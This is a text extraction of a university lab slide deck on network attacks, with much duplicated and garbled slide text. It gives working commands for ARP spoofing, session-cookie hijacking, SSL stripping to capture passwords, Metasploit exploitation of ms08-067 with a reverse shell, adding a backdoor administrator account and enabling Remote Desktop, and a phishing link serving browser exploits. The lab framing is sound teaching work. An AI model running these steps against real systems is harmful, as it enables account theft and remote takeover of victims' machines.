Вы находитесь на странице: 1из 28

Cybernetics and Economic Informatics Faculty Information Security Master

Computer Networks Security

Information Security Master Computer Networks Security Laboratory Topic: Network Attacks Adrian Furtun ă MSc,

Laboratory Topic: Network Attacks

Adrian Furtună MSc, C|EH

adif2k8@gmail.com

“With great power comes great responsibility”

Agenda 1. Interception of network traffic transmitted using a clear-text protocol (HTTP) => obtaining session

Agenda

Agenda 1. Interception of network traffic transmitted using a clear-text protocol (HTTP) => obtaining session cookies

1. Interception of network traffic transmitted using a clear-text protocol (HTTP)

=> obtaining session cookies => using session cookies to enter a victim’s web session

2. Interception of network traffic transmitted using an encrypted protocol (HTTPS)

=> obtaining username and password for web login

3. Scanning the Windows VM using nmap (+Snort disabled/enabled)

4. Scanning the Windows VM using Nessus (+Snort disabled/enabled)

5. Gaining access to the Windows VM by exploiting a network service vulnerability

6. Gaining access to a Windows machine with a client-side attack:

=> social engineering => exploit browser vulnerability => use Metasploit to own the machine

Network Attacks

2

Rules It is forbidden: Any scanning / attack outside laboratory network Any scanning / attack

Rules

Rules It is forbidden: Any scanning / attack outside laboratory network Any scanning / attack against

It is forbidden:

Any scanning / attack outside laboratory network Any scanning / attack against your colleagues’ machines or against instructor’s machine

Breaking these rules might lead to severe penalties

Network Attacks

3

Administrative tasks Connect to ftp://stud@my.laptop.ip username: stud password: stud Download: Course slides VMWare

Administrative tasks

Administrative tasks Connect to ftp://stud@my.laptop.ip username: stud password: stud Download: Course slides VMWare

Connect to ftp://stud@my.laptop.ip

username: stud password: stud

Download:

Course slides

VMWare Player: VMware-player-3.1.3.exe

Windows VM:

Backtrack VM:

winxpsp2_web_snort.zip

bt4-final-vm.zip

Install VMWare Player Unzip both virtual machines

Network Attacks

4

Virtual machine configuration Network Attacks 5

Virtual machine configuration

Virtual machine configuration Network Attacks 5

Network Attacks

5

Laboratory setup (1) You will work in pairs (1 pair = 2 distinct computers): attacker

Laboratory setup (1)

Laboratory setup (1) You will work in pairs (1 pair = 2 distinct computers): attacker and

You will work in pairs (1 pair = 2 distinct computers): attacker and victim

Victim machine = host machine

Attacker machine = Backtrack VM

Start Backtrack [ username: root, password: toor ]

Open graphic mode: startx&

Set network card in mode bridge !

Obtain IP address: dhclient eth0

Network Attacks

6

Laboratory setup (2) Network Attacks 7

Laboratory setup (2)

Laboratory setup (2) Network Attacks 7
Laboratory setup (2) Network Attacks 7

Network Attacks

7

Exercise 1 Obtain the session cookies of a victim from the local network and use

Exercise 1

Exercise 1 Obtain the session cookies of a victim from the local network and use them

Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail account

The victim needs a valid Yahoo mail account (a

test account) The victim will open a web mail session

The attacker

1. Becomes MITM

2. Captures network traffic of the victim and extracts the necessary data

Network Attacks

8

Exercise 1 – cont. Attacker machine: Become MITM and intercept all traffic sent by victim

Exercise 1 – cont.

Exercise 1 – cont. Attacker machine: Become MITM and intercept all traffic sent by victim to

Attacker machine:

Become MITM and intercept all traffic sent by victim to the Gateway. View the traffic using Wireshark.

1.

Find the IP addresses of Victim and Gateway

2.

Activate the routing process in Backtrack

echo 1 > /proc/sys/net/ipv4/ip_forward

3.

Inform the Victim that the Gateway’s MAC address is your MAC address – attacker. (ARP poisoning using ARP replies)

arpspoof

–i eth0

–t IP_Victim

IP_Gateway

4.

View the network traffic of Victim using Wireshark

Network Attacks

9

Exercise 1 – cont. Find the session cookies of Victim and use them to enter

Exercise 1 – cont.

Exercise 1 – cont. Find the session cookies of Victim and use them to enter his

Find the session cookies of Victim and use them to enter his email session

1. Wireshark -> Follow TCP stream on a TCP packet sent by Victim:

-> Follow TCP stream on a TCP packet sent by Victim: 2. Copy the cookies Y

2. Copy the cookies Y and T in a text file

3. Install the Firefox plugin AddNEdit Cookies

4. Open an Yahoo mail session of your own (attacker)

5. Use the plugin to edit your cookies and replace Y and T with the ones of the Victim

6. Refresh the web page

Network Attacks

10

Exercise 2 Intercept network traffic during a HTTPS session. Find the username and password of

Exercise 2

Exercise 2 Intercept network traffic during a HTTPS session. Find the username and password of the

Intercept network traffic during a HTTPS session. Find the username and password of the Victim.

1.

Make yourself MITM (see exercise 1)

2.

Start SSLSTRIP and make it listen on port 1234

sslstrip –l 1234 –s –w traffic.log More details here: http://www.thoughtcrime.org/software/sslstrip/

3.

Configure IPTABLES to redirect HTTP traffic to SSLSTRIP

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234

4.

The victim accesses a web site using HTTPS (ex. Yahoo login)

5.

Extract the useful information from file traffic.log

Network Attacks

11

About Snort http://www.snort.org/assets/166/snort_manual.pdf Netwok-based IDS Open source (free) Sourcefire –

About Snort

http://www.snort.org/assets/166/snort_manual.pdf

About Snort http://www.snort.org/assets/166/snort_manual.pdf Netwok-based IDS Open source (free) Sourcefire –

Netwok-based IDS

Open source (free)

Sourcefire – commercial version (appliance)

 

http://www.sourcefire.com/

Portable (Linux, Windows, MacOS X, Solaris, BSD,

Signatures (rules): www.bleedingsnort.com

HP-UX, etc) Multiple mechanisms for intrusion detection

 

Statistic anomalies

Protocol anomalies

Network Attacks

12

About Snort – cont. Snort running modes: • Sniffer mode (like tcpdump) Packet Stream snort.exe

About Snort – cont.

About Snort – cont. Snort running modes: • Sniffer mode (like tcpdump) Packet Stream snort.exe -v

Snort running modes:

• Sniffer mode (like tcpdump)

Packet Stream
Packet Stream

snort.exe -v –d -e

• Packet logger

Data Flow Snort Sniffing • NIDS Packet Decoder Preprocessor (Plug-ins) Detection Engine Output (Plug-ins) Stage
Data Flow
Snort
Sniffing
• NIDS
Packet Decoder
Preprocessor
(Plug-ins)
Detection
Engine
Output (Plug-ins) Stage
(Plug-ins)
Alerts/Logs

snort.exe –vde –log

\log

snort.exe –d –log \etc\snort.conf

\log

–c

Network Attacks

13

Nmap briefings TCP connect() scan: nmap –sT <IP Address> TCP SYN scan: nmap –sS <IP

Nmap briefings

Nmap briefings TCP connect() scan: nmap –sT <IP Address> TCP SYN scan: nmap –sS <IP Address>

TCP connect() scan:

nmap –sT <IP Address>

TCP SYN scan:

nmap –sS <IP Address>

TCP UDP scan:

nmap –sU <IP Address>

Ping scan:

nmap –sP <IP Address>

TCP FIN / Xmas Tree / Null scan:

nmap –sF/sX/sN <IP Address>

Version Detection:

nmap –sS -sV <IP Address>

OS Fingerprinting:

nmap –sS -O <IP Address>

Example $ nmapnmap --sSsS --sVsV --OO --FF --nn 192.168.1.1192.168.1.1

Network Attacks

14

Change setup Start the Windows VM New attack direction: Backtrack Windows VM Network Attacks 15

Change setup

Change setup Start the Windows VM New attack direction: Backtrack Windows VM Network Attacks 15

Start the Windows VM New attack direction:

Backtrack Windows VM

Network Attacks

15

Exercise 3 Using nmap , scan the whole subnet of the victim machine (connected to

Exercise 3

Exercise 3 Using nmap , scan the whole subnet of the victim machine (connected to vmnet8).

Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).

Obtain the following information (from a single scan):

• Live hosts

• Open TCP ports

• Service version

• Operating system

- Save all output in a text file

Hints:

nmap –h man nmap

Network Attacks

16

Exercise 3 – cont. Check if the scanning can be detected by a NIDS (Snort)

Exercise 3 – cont.

Exercise 3 – cont. Check if the scanning can be detected by a NIDS (Snort) Authenticate

Check if the scanning can be detected by a NIDS (Snort)

Authenticate to Windows VM (password: user) Start Snort

• cmd.exe

• snort.exe –d –l

-> cd c:\snort\bin

\log

–c

\etc\snort.conf

–A console

Perform the scanning again using Nmap

Any alert? (see c:\Snort\log\alert.ids)

Network Attacks

17

Exercise 4 Scan the victim machine using Nessus to find vulnerabilities 1. First install Nessus

Exercise 4

Exercise 4 Scan the victim machine using Nessus to find vulnerabilities 1. First install Nessus on

Scan the victim machine using Nessus to find vulnerabilities

1.

First install Nessus on BackTrack:

Download Nessus (for Ubuntu 9.10 32 bit) dpkg –i Nessus-4.4.1-ubuntu910_i386.deb

http://www.tenable.com

2.

Then obtain a Nessus activation code (Home Feed)

http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed

3.

Configure Nessus server

 

Add a Nessus user:

/opt/nessus/sbin/nessus-adduser

Register Nessus and update plugins:

 

/opt/nessus/bin/nessus-fetch --register CODE

 

Start Nessus server:

/etc/init.d/nessusd start

4.

Start Nessus client:

https://127.0.0.1:8834

Network Attacks

18

Exercise 4 – cont. Sample vulnerability: 1. Create a scan policy 2. Select plugins 3.

Exercise 4 – cont.

Exercise 4 – cont. Sample vulnerability: 1. Create a scan policy 2. Select plugins 3. Set

Sample vulnerability:

1. Create a scan policy

2. Select plugins

3. Set target

4. Run scan

– cont. Sample vulnerability: 1. Create a scan policy 2. Select plugins 3. Set target 4.

Network Attacks

19

About Metasploit Framework for writing and executing exploits Modules Exploits Auxiliary Payloads Encoders

About Metasploit

About Metasploit Framework for writing and executing exploits Modules Exploits Auxiliary Payloads Encoders

Framework for writing and executing exploits

Modules Exploits Auxiliary Payloads Encoders Nops

User interfaces:

Updates:

- console: msfconsole

- GUI:

cd /pentest/exploits/framework3

svn update

msfgui

Select Exploit -> Configure options + payload -> Run exploit -> Execute payload

Tutorial:

http://www.offensive-security.com/metasploit-unleashed

Network Attacks

20

Exercise 5 We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to

Exercise 5

Exercise 5 We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to Victim

We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to Victim machine

1.

cd /pentest/exploits/framework3

2.

./msfconsole

3.

help

4.

search ms08-067

5.

use exploit/windows/smb/ms08_067_netapi

6.

show options

7.

show payloads

8.

set RHOST, LHOST, PAYLOAD, TARGET = 3, etc (for payload use windows/shell/reverse_tcp)

8.

exploit

9.

Execute windows commands in the obtained shell (ex. ipconfig, hostname)

Network Attacks

21

Exercise 5 – cont. Obtain Remote Desktop access to Victim machine: Add a new user:

Exercise 5 – cont.

Exercise 5 – cont. Obtain Remote Desktop access to Victim machine: Add a new user: net

Obtain Remote Desktop access to Victim machine:

Add a new user:

net user myuser mypassword /add

Add the new user in the local Administrators group:

net localgroup Administrators myuser /add

Start the Remote Desktop service

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Check if the victim has open the port for Remote Desktop (use nmap)

Connect to the victim machine using:

rdesktop 192.168.x.x &

Network Attacks

22

What if? Victim has all ports closed (firewall) Operating system is patched Answer: Attack client

What if?

What if? Victim has all ports closed (firewall) Operating system is patched Answer: Attack client applications

Victim has all ports closed (firewall) Operating system is patched

Answer:

Attack client applications and plugins

(web browser, Acrobat Reader, MS Office, etc)

Network Attacks

23

Change setup Start the firewall of Windows VM Disable any exceptions Use nmap to verify

Change setup

Change setup Start the firewall of Windows VM Disable any exceptions Use nmap to verify that

Start the firewall of Windows VM Disable any exceptions Use nmap to verify that there are no more open ports

Network Attacks

24

Exercise 6 Exploit browser vulnerability to gain remote acces. Use Metasploit and browser autopwn 1.

Exercise 6

Exercise 6 Exploit browser vulnerability to gain remote acces. Use Metasploit and browser autopwn 1. cd

Exploit browser vulnerability to gain remote acces. Use Metasploit and browser autopwn

1. cd /pentest/exploits/framework3

2. ./msfconsole

3. use auxiliary/server/browser_autopwn

4. set LHOST 192.168.x.x

5. set SRVPORT 80

6. set URIPATH mypictures.html

7. exploit

(attacker IP)

Network Attacks

25

Exercise 6 – cont. Send victim an email containing the link: http://192.168.x.x/mypictures.html Victim clicks the

Exercise 6 – cont.

Exercise 6 – cont. Send victim an email containing the link: http://192.168.x.x/mypictures.html Victim clicks the link

Send victim an email containing the link:

http://192.168.x.x/mypictures.html

Victim clicks the link Attacker obtains meterpreter session

Network Attacks

26

Other useful tools Ettercap http://ettercap.sourceforge.net Cain&Abel http://www.oxid.it/cain.html The Middler

Other useful tools

Other useful tools Ettercap http://ettercap.sourceforge.net Cain&Abel http://www.oxid.it/cain.html The Middler

Ettercap

http://ettercap.sourceforge.net

Cain&Abel

http://www.oxid.it/cain.html

The Middler

http://inguardians.com/tools

Network Attacks

27

Q & A ? Network Attacks 28

Q & A

Q & A ? Network Attacks 28

?

Network Attacks

28